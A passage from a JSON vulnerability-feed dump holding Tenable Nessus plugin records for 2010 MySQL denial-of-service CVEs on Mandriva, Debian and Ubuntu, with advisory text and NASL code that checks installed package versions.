to crash\n (CVE-2010-3833).\n\n - The server could crash after materializing a derived\n table that required a temporary table for grouping\n (CVE-2010-3834).\n\n - A user-variable assignment expression that is evaluated\n in a logical expression context can be precalculated in\n a temporary table for GROUP BY. However, when the\n expression value is used after creation of the temporary\n table, it was re-evaluated, not read from the table and\n a server crash resulted (CVE-2010-3835).\n\n - Pre-evaluation of LIKE predicates during view\n preparation could cause a server crash (CVE-2010-3836).\n\n - GROUP_CONCAT() and WITH ROLLUP together could cause a\n server crash (CVE-2010-3837).\n\n - Queries could cause a server crash if the GREATEST() or\n LEAST() function had a mixed list of numeric and\n LONGBLOB arguments, and the result of such a function\n was processed using an intermediate temporary table\n (CVE-2010-3838).\n\n - Queries with nested joins could cause an infinite loop\n in the server when used from stored procedures and\n prepared statements (CVE-2010-3839).\n\n - The PolyFromWKB() function could crash the server when\n improper WKB data was passed to the function\n (CVE-2010-3840).\n\nAdditionally the default behaviour of using the mysqlmanager instead\nof the mysqld_safe script has been reverted in the SysV init script\nbecause of instability issues with the mysqlmanager.\n\nPackages for 2009.0 are provided as of the Extended Maintenance\nProgram. Please visit this link to learn more:\nhttp://store.mandriva.com/product_info.php?cPath=149&amp;products_id=4\n90\n\nThe updated packages have been upgraded to mysql 5.0.91 and patched to\ncorrect these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.mysql.com/bug.php?id=51875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.mysql.com/bug.php?id=52711\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.mysql.com/bug.php?id=53544\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.mysql.com/bug.php?id=54007\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.mysql.com/bug.php?id=54044\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.mysql.com/bug.php?id=54461\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.mysql.com/bug.php?id=54476\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.mysql.com/bug.php?id=54568\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.mysql.com/bug.php?id=54575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.mysql.com/bug.php?id=55564\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.mysql.com/bug.php?id=55568\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.mysql.com/bug.php?id=55826\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://dev.mysql.com/doc/refman/5.0/en/news-5-0-91.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64mysql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64mysql-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64mysql15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libmysql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libmysql-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libmysql15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mysql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mysql-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mysql-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mysql-max\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mysql-ndb-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mysql-ndb-management\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mysql-ndb-storage\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mysql-ndb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64mysql-devel-5.0.91-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64mysql-static-devel-5.0.91-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64mysql15-5.0.91-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libmysql-devel-5.0.91-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libmysql-static-devel-5.0.91-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libmysql15-5.0.91-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"mysql-5.0.91-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"mysql-bench-5.0.91-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"mysql-client-5.0.91-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"mysql-common-5.0.91-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"mysql-doc-5.0.91-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"mysql-max-5.0.91-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"mysql-ndb-extra-5.0.91-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"mysql-ndb-management-5.0.91-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"mysql-ndb-storage-5.0.91-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"mysql-ndb-tools-5.0.91-0.1mdv2009.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:11:36", "references": ["https://security-tracker.debian.org/tracker/CVE-2010-3836", "https://security-tracker.debian.org/tracker/CVE-2010-3681", "https://security-tracker.debian.org/tracker/CVE-2010-3840", "https://security-tracker.debian.org/tracker/CVE-2010-3834", "https://security-tracker.debian.org/tracker/CVE-2010-3838", "https://security-tracker.debian.org/tracker/CVE-2010-3680", "https://security-tracker.debian.org/tracker/CVE-2010-3835", "https://www.debian.org/security/2011/dsa-2143", "https://security-tracker.debian.org/tracker/CVE-2010-3833", "https://security-tracker.debian.org/tracker/CVE-2010-3682", "https://security-tracker.debian.org/tracker/CVE-2010-3837", "https://security-tracker.debian.org/tracker/CVE-2010-3677"], "pluginID": "51530", "description": "Several vulnerabilities have been discovered in the MySQL database\nserver. The Common Vulnerabilities and Exposures project identifies\nthe following problems :\n\n - CVE-2010-3677\n It was discovered that MySQL allows remote authenticated\n users to cause a denial of service (mysqld daemon crash)\n via a join query that uses a table with a unique SET\n column.\n\n - CVE-2010-3680\n It was discovered that MySQL allows remote authenticated\n users to cause a denial of service (mysqld daemon crash)\n by creating temporary tables while using InnoDB, which\n triggers an assertion failure.\n\n - CVE-2010-3681\n It was discovered that MySQL allows remote authenticated\n users to cause a denial of service (mysqld daemon crash)\n by using the HANDLER interface and performing 'alternate\n reads from two indexes on a table,' which triggers an\n assertion failure.\n\n - CVE-2010-3682\n It was discovered that MySQL incorrectly handled use of\n EXPLAIN with certain queries. An authenticated user\n could crash the server.\n\n - CVE-2010-3833\n It was discovered that MySQL incorrectly handled\n propagation during evaluation of arguments to\n extreme-value functions. An authenticated user could\n crash the server.\n\n - CVE-2010-3834\n It was discovered that MySQL incorrectly handled\n materializing a derived table that required a temporary\n table for grouping. An authenticated user could crash\n the server.\n\n - CVE-2010-3835\n It was discovered that MySQL incorrectly handled certain\n user-variable assignment expressions that are evaluated\n in a logical expression context. An authenticated user\n could crash the server.\n\n - CVE-2010-3836\n It was discovered that MySQL incorrectly handled\n pre-evaluation of LIKE predicates during view\n preparation. An authenticated user could crash the\n server.\n\n - CVE-2010-3837\n It was discovered that MySQL incorrectly handled using\n GROUP_CONCAT() and WITH ROLLUP together. An\n authenticated user could crash the server.\n\n - CVE-2010-3838\n It was discovered that MySQL incorrectly handled certain\n queries using a mixed list of numeric and LONGBLOB\n arguments to the GREATEST() or LEAST() functions. An\n authenticated user could crash the server.\n\n - CVE-2010-3840\n It was discovered that MySQL incorrectly handled\n improper WKB data passed to the PolyFromWKB() function.\n An authenticated user could crash the server.", "edition": 8, "reporter": "Tenable", "published": "2011-01-17T00:00:00", "title": "Debian DSA-2143-1 : mysql-dfsg-5.0 - several vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3836", "CVE-2010-3677", "CVE-2010-3834", "CVE-2010-3838"], "modified": "2018-11-10T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:5.0", "p-cpe:/a:debian:debian_linux:mysql-dfsg-5.0"], "id": "DEBIAN_DSA-2143.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=51530", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2143. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51530);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/10 11:49:34\");\n\n script_cve_id(\"CVE-2010-3677\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3833\", \"CVE-2010-3834\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3840\");\n script_bugtraq_id(42598, 42599, 42633, 42646, 43676);\n script_xref(name:\"DSA\", value:\"2143\");\n\n script_name(english:\"Debian DSA-2143-1 : mysql-dfsg-5.0 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the MySQL database\nserver. The Common Vulnerabilities and Exposures project identifies\nthe following problems :\n\n - CVE-2010-3677\n It was discovered that MySQL allows remote authenticated\n users to cause a denial of service (mysqld daemon crash)\n via a join query that uses a table with a unique SET\n column.\n\n - CVE-2010-3680\n It was discovered that MySQL allows remote authenticated\n users to cause a denial of service (mysqld daemon crash)\n by creating temporary tables while using InnoDB, which\n triggers an assertion failure.\n\n - CVE-2010-3681\n It was discovered that MySQL allows remote authenticated\n users to cause a denial of service (mysqld daemon crash)\n by using the HANDLER interface and performing 'alternate\n reads from two indexes on a table,' which triggers an\n assertion failure.\n\n - CVE-2010-3682\n It was discovered that MySQL incorrectly handled use of\n EXPLAIN with certain queries. An authenticated user\n could crash the server.\n\n - CVE-2010-3833\n It was discovered that MySQL incorrectly handled\n propagation during evaluation of arguments to\n extreme-value functions. An authenticated user could\n crash the server.\n\n - CVE-2010-3834\n It was discovered that MySQL incorrectly handled\n materializing a derived table that required a temporary\n table for grouping. An authenticated user could crash\n the server.\n\n - CVE-2010-3835\n It was discovered that MySQL incorrectly handled certain\n user-variable assignment expressions that are evaluated\n in a logical expression context. An authenticated user\n could crash the server.\n\n - CVE-2010-3836\n It was discovered that MySQL incorrectly handled\n pre-evaluation of LIKE predicates during view\n preparation. An authenticated user could crash the\n server.\n\n - CVE-2010-3837\n It was discovered that MySQL incorrectly handled using\n GROUP_CONCAT() and WITH ROLLUP together. An\n authenticated user could crash the server.\n\n - CVE-2010-3838\n It was discovered that MySQL incorrectly handled certain\n queries using a mixed list of numeric and LONGBLOB\n arguments to the GREATEST() or LEAST() functions. An\n authenticated user could crash the server.\n\n - CVE-2010-3840\n It was discovered that MySQL incorrectly handled\n improper WKB data passed to the PolyFromWKB() function.\n An authenticated user could crash the server.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-3677\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-3680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-3681\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-3682\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-3833\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-3834\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-3835\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-3836\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-3837\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-3838\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-3840\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2143\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the mysql-dfsg-5.0 packages.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 5.0.51a-24+lenny5.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mysql-dfsg-5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"mysql-dfsg-5.0\", reference:\"5.0.51a-24+lenny5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:11:20", "references": ["https://usn.ubuntu.com/1017-1/"], "pluginID": "50573", "description": "It was discovered that MySQL incorrectly handled certain requests with\nthe UPGRADE DATA DIRECTORY NAME command. An authenticated user could\nexploit this to make MySQL crash, causing a denial of service. This\nissue only affected Ubuntu 9.10 and 10.04 LTS. (CVE-2010-2008)\n\nIt was discovered that MySQL incorrectly handled joins involving a\ntable with a unique SET column. An authenticated user could exploit\nthis to make MySQL crash, causing a denial of service. This issue only\naffected Ubuntu 6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS.\n(CVE-2010-3677)\n\nIt was discovered that MySQL incorrectly handled NULL arguments to\nIN() or CASE operations. An authenticated user could exploit this to\nmake MySQL crash, causing a denial of service. This issue only\naffected Ubuntu 9.10 and 10.04 LTS. (CVE-2010-3678)\n\nIt was discovered that MySQL incorrectly handled malformed arguments\nto the BINLOG statement. An authenticated user could exploit this to\nmake MySQL crash, causing a denial of service. This issue only\naffected Ubuntu 9.10 and 10.04 LTS. (CVE-2010-3679)\n\nIt was discovered that MySQL incorrectly handled the use of TEMPORARY\nInnoDB tables with nullable columns. An authenticated user could\nexploit this to make MySQL crash, causing a denial of service. This\nissue only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS.\n(CVE-2010-3680)\n\nIt was discovered that MySQL incorrectly handled alternate reads from\ntwo indexes on a table using the HANDLER interface. An authenticated\nuser could exploit this to make MySQL crash, causing a denial of\nservice. This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.10 and\n10.04 LTS. (CVE-2010-3681)\n\nIt was discovered that MySQL incorrectly handled use of EXPLAIN with\ncertain queries. An authenticated user could exploit this to make\nMySQL crash, causing a denial of service. This issue only affected\nUbuntu 6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS. (CVE-2010-3682)\n\nIt was discovered that MySQL incorrectly handled error reporting when\nusing LOAD DATA INFILE and would incorrectly raise an assert in\ncertain circumstances. An authenticated user could exploit this to\nmake MySQL crash, causing a denial of service. This issue only\naffected Ubuntu 9.10 and 10.04 LTS. (CVE-2010-3683)\n\nIt was discovered that MySQL incorrectly handled propagation during\nevaluation of arguments to extreme-value functions. An authenticated\nuser could exploit this to make MySQL crash, causing a denial of\nservice. This issue only affected Ubuntu 8.04 LTS, 9.10, 10.04 LTS and\n10.10. (CVE-2010-3833)\n\nIt was discovered that MySQL incorrectly handled materializing a\nderived table that required a temporary table for grouping. An\nauthenticated user could exploit this to make MySQL crash, causing a\ndenial of service. (CVE-2010-3834)\n\nIt was discovered that MySQL incorrectly handled certain user-variable\nassignment expressions that are evaluated in a logical expression\ncontext. An authenticated user could exploit this to make MySQL crash,\ncausing a denial of service. This issue only affected Ubuntu 8.04 LTS,\n9.10, 10.04 LTS and 10.10. (CVE-2010-3835)\n\nIt was discovered that MySQL incorrectly handled pre-evaluation of\nLIKE predicates during view preparation. An authenticated user could\nexploit this to make MySQL crash, causing a denial of service.\n(CVE-2010-3836)\n\nIt was discovered that MySQL incorrectly handled using GROUP_CONCAT()\nand WITH ROLLUP together. An authenticated user could exploit this to\nmake MySQL crash, causing a denial of service. (CVE-2010-3837)\n\nIt was discovered that MySQL incorrectly handled certain queries using\na mixed list of numeric and LONGBLOB arguments to the GREATEST() or\nLEAST() functions. An authenticated user could exploit this to make\nMySQL crash, causing a denial of service. (CVE-2010-3838)\n\nIt was discovered that MySQL incorrectly handled queries with nested\njoins when used from stored procedures and prepared statements. An\nauthenticated user could exploit this to make MySQL hang, causing a\ndenial of service. This issue only affected Ubuntu 9.10, 10.04 LTS and\n10.10. (CVE-2010-3839)\n\nIt was discovered that MySQL incorrectly handled improper WKB data\npassed to the PolyFromWKB() function. An authenticated user could\nexploit this to make MySQL crash, causing a denial of service.\n(CVE-2010-3840).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 7, "reporter": "Tenable", "published": "2010-11-12T00:00:00", "title": "Ubuntu 6.06 LTS / 8.04 LTS / 9.10 / 10.04 LTS / 10.10 : mysql-5.1, mysql-dfsg-5.0, mysql-dfsg-5.1 vulnerabilities (USN-1017-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3679", "CVE-2010-2008", "CVE-2010-3836", "CVE-2010-3683", "CVE-2010-3677", "CVE-2010-3834", "CVE-2010-3838"], "modified": "2018-12-01T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libmysqlclient15off", "p-cpe:/a:canonical:ubuntu_linux:libmysqlclient15-dev", "p-cpe:/a:canonical:ubuntu_linux:mysql-server", "p-cpe:/a:canonical:ubuntu_linux:libmysqlclient-dev", "p-cpe:/a:canonical:ubuntu_linux:mysql-client", "p-cpe:/a:canonical:ubuntu_linux:mysql-client-5.0", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:mysql-client-5.1", "p-cpe:/a:canonical:ubuntu_linux:libmysqlclient16", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:libmysqlclient16-dev", "cpe:/o:canonical:ubuntu_linux:10.10", "cpe:/o:canonical:ubuntu_linux:9.10", "p-cpe:/a:canonical:ubuntu_linux:mysql-testsuite", "p-cpe:/a:canonical:ubuntu_linux:mysql-server-5.0", "p-cpe:/a:canonical:ubuntu_linux:mysql-common", "p-cpe:/a:canonical:ubuntu_linux:mysql-server-core-5.1", "p-cpe:/a:canonical:ubuntu_linux:mysql-server-5.1", "p-cpe:/a:canonical:ubuntu_linux:libmysqld-dev", "p-cpe:/a:canonical:ubuntu_linux:mysql-client-core-5.1", "p-cpe:/a:canonical:ubuntu_linux:libmysqld-pic", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts"], "id": "UBUNTU_USN-1017-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50573", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1017-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50573);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/12/01 13:19:06\");\n\n script_cve_id(\"CVE-2010-2008\", \"CVE-2010-3677\", \"CVE-2010-3678\", \"CVE-2010-3679\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3683\", \"CVE-2010-3833\", \"CVE-2010-3834\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3839\", \"CVE-2010-3840\");\n script_bugtraq_id(41198, 42596, 42598, 42599, 42625, 42633, 42638, 42646, 43676);\n script_xref(name:\"USN\", value:\"1017-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 8.04 LTS / 9.10 / 10.04 LTS / 10.10 : mysql-5.1, mysql-dfsg-5.0, mysql-dfsg-5.1 vulnerabilities (USN-1017-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that MySQL incorrectly handled certain requests with\nthe UPGRADE DATA DIRECTORY NAME command. An authenticated user could\nexploit this to make MySQL crash, causing a denial of service. This\nissue only affected Ubuntu 9.10 and 10.04 LTS. (CVE-2010-2008)\n\nIt was discovered that MySQL incorrectly handled joins involving a\ntable with a unique SET column. An authenticated user could exploit\nthis to make MySQL crash, causing a denial of service. This issue only\naffected Ubuntu 6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS.\n(CVE-2010-3677)\n\nIt was discovered that MySQL incorrectly handled NULL arguments to\nIN() or CASE operations. An authenticated user could exploit this to\nmake MySQL crash, causing a denial of service. This issue only\naffected Ubuntu 9.10 and 10.04 LTS. (CVE-2010-3678)\n\nIt was discovered that MySQL incorrectly handled malformed arguments\nto the BINLOG statement. An authenticated user could exploit this to\nmake MySQL crash, causing a denial of service. This issue only\naffected Ubuntu 9.10 and 10.04 LTS. (CVE-2010-3679)\n\nIt was discovered that MySQL incorrectly handled the use of TEMPORARY\nInnoDB tables with nullable columns. An authenticated user could\nexploit this to make MySQL crash, causing a denial of service. This\nissue only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS.\n(CVE-2010-3680)\n\nIt was discovered that MySQL incorrectly handled alternate reads from\ntwo indexes on a table using the HANDLER interface. An authenticated\nuser could exploit this to make MySQL crash, causing a denial of\nservice. This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.10 and\n10.04 LTS. (CVE-2010-3681)\n\nIt was discovered that MySQL incorrectly handled use of EXPLAIN with\ncertain queries. An authenticated user could exploit this to make\nMySQL crash, causing a denial of service. This issue only affected\nUbuntu 6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS. (CVE-2010-3682)\n\nIt was discovered that MySQL incorrectly handled error reporting when\nusing LOAD DATA INFILE and would incorrectly raise an assert in\ncertain circumstances. An authenticated user could exploit this to\nmake MySQL crash, causing a denial of service. This issue only\naffected Ubuntu 9.10 and 10.04 LTS. (CVE-2010-3683)\n\nIt was discovered that MySQL incorrectly handled propagation during\nevaluation of arguments to extreme-value functions. An authenticated\nuser could exploit this to make MySQL crash, causing a denial of\nservice. This issue only affected Ubuntu 8.04 LTS, 9.10, 10.04 LTS and\n10.10. (CVE-2010-3833)\n\nIt was discovered that MySQL incorrectly handled materializing a\nderived table that required a temporary table for grouping. An\nauthenticated user could exploit this to make MySQL crash, causing a\ndenial of service. (CVE-2010-3834)\n\nIt was discovered that MySQL incorrectly handled certain user-variable\nassignment expressions that are evaluated in a logical expression\ncontext. An authenticated user could exploit this to make MySQL crash,\ncausing a denial of service. This issue only affected Ubuntu 8.04 LTS,\n9.10, 10.04 LTS and 10.10. (CVE-2010-3835)\n\nIt was discovered that MySQL incorrectly handled pre-evaluation of\nLIKE predicates during view preparation. An authenticated user could\nexploit this to make MySQL crash, causing a denial of service.\n(CVE-2010-3836)\n\nIt was discovered that MySQL incorrectly handled using GROUP_CONCAT()\nand WITH ROLLUP together. An authenticated user could exploit this to\nmake MySQL crash, causing a denial of service. (CVE-2010-3837)\n\nIt was discovered that MySQL incorrectly 